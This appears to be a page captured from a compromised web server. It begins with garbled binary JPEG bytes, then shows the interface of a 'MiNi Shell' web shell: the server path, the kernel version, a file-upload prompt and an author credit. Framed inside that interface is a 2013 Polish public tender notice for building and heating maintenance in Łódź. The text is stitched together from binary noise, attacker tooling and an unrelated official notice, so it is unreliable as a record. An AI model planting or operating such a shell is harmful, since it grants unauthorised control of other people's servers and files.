JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130103/2091-N-2013.html

<p class="kh_header"><b>Łódź: Usługi   w   zakresie   bieżącej  konserwacji   budynków oraz  konserwacji    i   napraw   instalacji   co   i    cw.</b><br>
<b>Numer ogłoszenia: 2091 - 2013; data zamieszczenia: 03.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Polesie "Zielony Rynek" , Pl. Barlickiego 11, 90-615 Łódź, woj. łódzkie, tel. 42 6330180, faks 42 6339607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zielonyrynek.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi   w   zakresie   bieżącej  konserwacji   budynków oraz  konserwacji    i   napraw   instalacji   co   i    cw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  są  usługi  w  zakresie  bieżącej  konserwacji i  napraw  wykonywanych  w    budynkach   będących   własnością:  Gminy Łódź   i  Skarbu Państwa, zarządzanych   przez  Administrację  Nieruchomościami   Łódź - Polesie  Zielony  Rynek.                  
Wykaz    nieruchomości   objętych  zamówieniem   przedstawia   załącznik   nr  2 .
Zamawiający zastrzega sobie prawo do zmiany wykazu nieruchomości objętych zamówieniem w trakcie realizacji umowy.

Zakres   świadczonych   prac     konserwacyjno - remontowych     ujęty   został    w         Jednostkowym  Cenniku  Robót załącznik   nr  4, w   którym   należy  określić   ceny   jednostkowe     wszystkich   pozycji  cennikowych.
Ceny jednostkowe poszczególnych pozycji cennika obejmować powinny wszystkie  koszty związane z wykonaniem danej pracy tj. robocizna, materiał wraz z kosztami zakupu, koszt pracy sprzętu, koszty wywozu gruzu, rumowia i zdemontowanych urządzeń itp. łącznie z narzutami (bez podatku VAT).  
        
    
Zakres  świadczonych  konserwacji  i  napraw  obejmuje: 

1.Usuwanie  usterek  i  awarii.
wodno - kanalizacyjnych 
gazowych
elektrycznych
ogólnobudowlanych
stolarsko-ślusarsko-szklarskich
instalacji i urządzeń  co i cw

2. Konserwacje  oraz  naprawy  instalacji  i  urządzeń technicznych  w  budynkach:
2.1.Instalacja  wod - kan.
Konserwacja  instalacji i  urządzeń  wodociągowych  polegająca na usuwaniu przecieków,  wymianie  uszkodzonych odcinków rur, zaworów  czerpalnych  lub  przelotowych, zabezpieczanie  instalacji  przed  zamarzaniem, oczyszczaniu    studzienek  rewizyjnych, udrożnianiu  podejść odpływowych  i pionów, wymiana uszkodzonych  odcinków  rur  kanalizacyjnych, urządzeń sanitarnych i osprzętu w  pomieszczeniach wspólnego użytku, zabezpieczaniu odkrytych włazów studzienek kanalizacyjnych wraz z montażem nowych.



2.2.Instalacja  gazowa
   Konserwacja  instalacji  gazowej  polegająca  na  wymianie  uszkodzonych  odcinków  rur  gazowych,  wymianie   zaworów    gazowych,  demontażu   urządzeń  i  ich  podłączenie,  wykonaniu  próby  szczelności  instalacji  gazowych  w  lokalach  i  wykonywaniu  próby  głównej.
2.3.Instalacja  elektryczna.
Konserwacja  tablic rozdzielczych  wewnętrznych   linii zasilających oraz instalacji  i  osprzętu   w   pomieszczeniach  ogólnego  użytku polegająca  na czyszczeniu  styków,  sprawdzeniu  prawidłowości  podłączeń, wymiana  lub  uzupełnienie osprzętu  elektrycznego.
Stała  kontrola  podłączeń  i  eliminowanie  odcinanie  podłączeń zagrażających bezpieczeństwu   oraz  podłączeń nielegalnych.   
2.4. Konserwacje  i  naprawy  w  zakresie  ogólnobudowlanym.
Łatanie  i  naprawa drobnych  uszkodzeń  pokrycia dachowego, przesmarowanie powierzchni,
oczyszczanie    rynien    i     rur     spustowych      z     wymianą    elementów, 
naprawa poprzez  prostowanie, umocowanie  lub  lutowanie  drobnych uszkodzeń  obróbek  blacharskich, daszków, gzymsów, pasów pod i nadrynnowych, parapetów  zewnętrznych  i  innych  występujących  na elewacji  i  dachu. 
Wymiana   uchwytów   do  rur  spustowych, uzupełnienie  rur spustowych w  odcinkach  ponad  1  mb , wymiana zewnętrznych   podokienników  z  blachy,       
naprawa uszkodzeń tynków ścian i sufitów, podłóg drewnianych  i posadzek, schodów wejściowych do budynków  i  na  klatkach schodowych  zarówno  drewnianych  jak  i  betonowych, naprawa poręczy  i balustrad, wykonanie  opaski  betonowej  na zewnątrz  budynku,
wymiana  pieców  lub  kuchni  węglowych w  zakresie: zakup urządzenia, odłączenie  istniejącego, podłączenie  nowego  montaż  blachy  przypiecowej, wywiezienie starego.
dopasowanie  i  naprawa  stolarki  okiennej  i  drzwiowej oraz  jej  szklenie  i   uzupełnianie    zamków,   zabezpieczenie  okien  strychowych  płytą  lub  siatką,
malowaniu  bram  metalowych,
malowanie  ścian, sufitów, stolarki  okiennej  i drzwiowej,  
wymiana    podsufitki z  desek  lub  płyt,
rozbiórka małych kubatur budynków gospodarczych o konstrukcji murowanej,
zbicie sopli lodowych i nawisów śnieżnych
3. Konserwacja oraz  naprawa  instalacji  i  urządzeń  co  i  cw  w  zakresie:
Przegląd  instalacji  i   urządzeń   instalacji   centralnego   ogrzewania   przed  rozpoczęciem   sezonu   grzewczego   oraz   po   jego   zakończeniu.
Konserwacja    instalacji   i   urządzeń   co   w   czasie   sezonu  grzewczego  z wymianą pojedynczych   zaworów  grzejnikowych  lub  doszczelnienie zaworów  izolacją  instalacji  co,  
Odpowietrzanie   instalacji   i   grzejników.
Doszczelnianie   zaworów    odcinających    w   węźle,   na   pionach   i   poziomach,
Przeglądy  urządzeń  węzłów  cieplnych,  w   tym   również  dokonywane przy   udziale   pracowników   Dalkia Łódź
Likwidacja  przyczyny   niedogrzań  w  lokalach.

Wykaz budynków wyposażonych w instalacje co i cw stanowi załącznik nr 5 - Formularz cenowy, w którym określić należy całkowity, ryczałtowy miesięczny  koszt konserwacji instalacji co i cw na poszczególne budynki wyposażone w te media.  


5.Realizacja zadań konserwacyjnych odbywać się będzie poprzez codzienne przyjmowanie przez Wykonawcę pisemnych zgłoszeń wystawianych przez administratorów.
6.Prace konserwacyjne objęte Jednostkowym Cennikiem Robót rozliczane będą zgodnie z cenami określonymi w ofercie Wykonawcy przez cały okres objęty zamówieniem. 
7.Dla prac z zakresu  konserwacji i napraw  nie  ujętych  w Jednostkowym Cenniku Robót - wycenianych na podstawie katalogów KNR i oferowanej stawki 1 roboczogodziny netto z narzutami (Kp i zysk), ceny materiałów i pracy sprzętu nie mogą być większe od średnich cen materiałów (z kosztami zakupu) i pracy sprzętu wyszczególnionych w wydawnictwie Sekocenbud z okresu realizacji prac. 
8.Dla materiałów nie ujętych w w/w wydawnictwie lub narzuconych przez Zamawiającego, rozliczenie materiałów nastąpi na podstawie zaakceptowanych przez administratora (inspektora nadzoru) rachunków zakupu (do których doliczane będą koszty zakupu w wysokości 5%).
9.Do faktur za wykonane usługi Wykonawca załączał będzie wykaz wykonanych prac na poszczególnych nieruchomościach.
10.Wykonane prace konserwacyjne muszą być potwierdzone przez najemcę lub administratora.
11.Zmiana zakresu prac konserwacyjnych wymagać będzie pisemnej zgody zlecającego.
12.W obowiązku Wykonawcy będzie doprowadzenie do należytego stanu terenu po zakończonych pracach wraz z wywiezieniem gruzu i rumowia.
13.Zlecane usługi konserwacyjne realizowane będą w następujących terminach:
-  do  realizacji  natychmiastowej   -    awarie   i    zgłoszenia   zagrażające    życiu,  zdrowiu   i   mieniu,
-  na  dzień   następny  -   sprawy   pilne   lecz   nie  stanowiące    zagrożenia  życia,  zdrowia   i   mienia.
- Inne   -    w    terminie   ustalonym    z    administratorem    lub    lokatorem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3, 50.72.00.00-8, 50.71.20.00-9, 50.71.00.00-5, 50.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełniają Wykonawcy, którzy w okresie ostatnich pięciu lat przed wszczęciem 	postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywali 	należycie minimum dwa  zamówienia odpowiadające swoim zakresem pracą stanowiącym 	przedmiot zamówienia. Suma wartości wykonanych w danym roku prac powinna być zbliżona 	do wartości zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełniają Wykonawcy, którzy dysponują odpowiednim potencjałem technicznym 	niezbędnym do prawidłowego wykonania zamówienia lub posiadają pisemne zobowiązanie 	innych 	podmiotów do udostępnienia im potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełniają Wykonawcy, którzy dysponują osobami posiadającymi wymagane 	uprawnienia do wykonania zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich 	uprawnień, lub posiadają pisemne zobowiązanie innych podmiotów do udostępnienia im 	potencjału technicznego i osób zdolnych do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełniają Wykonawcy, którzy posiadają polisę lub inny dokument potwierdzający, że 	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę 		min. 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.W celu potwierdzenia, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia do oferty należy załączyć:
3.1kserokopie uprawnień budowlanych oraz instalacyjnych (elektrycznych i sanitarnych);
3.2świadectwa kwalifikacyjne (typ D) uprawniające do wykonywania pracy na stanowisku dozoru w zakresie obsługi, konserwacji i montażu urządzeń i instalacji cieplnej, elektroenergetycznej i gazowej;
3.3świadectwa kwalifikacyjne (typ E) uprawniające do wykonywania pracy w zakresie obsługi, konserwacji, montażu urządzeń i instalacji cieplnej, elektroenergetycznej i gazowej;
3.4zaświadczenia przynależności do Okręgowej Izby Inżynierów Budownictwa osób/y pełniących funkcję kierownika robót;
3.5załączyć wykaz osób, które będą wykonywać zamówienie (zał nr 7 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art. 144 ust 1 ustawy Prawo zamówień publicznych Zamawiający zastrzega sobie możliwość dokonania istotnych zmian postanowień umowy w zakresie:
1) zamiany wykazu nieruchomości objętych zamówieniem (tylko w uzasadnionych przypadkach niezależnych od stron, których nie można było przewidzieć przed podpisaniem umowy).
2) możliwości zmiany w trakcie trwania umowy stawki podatku VAT (w przypadku zmiany przepisów dotyczących podatku VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zielonyrynek.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Polesie Zielony Rynek 
Pl. Barlickiego 11 pok.4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2013 godzina 10:00, miejsce: Administracja Nieruchomościami Łódź - Polesie Zielony Rynek 
Pl. Barlickiego 11 pok.4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com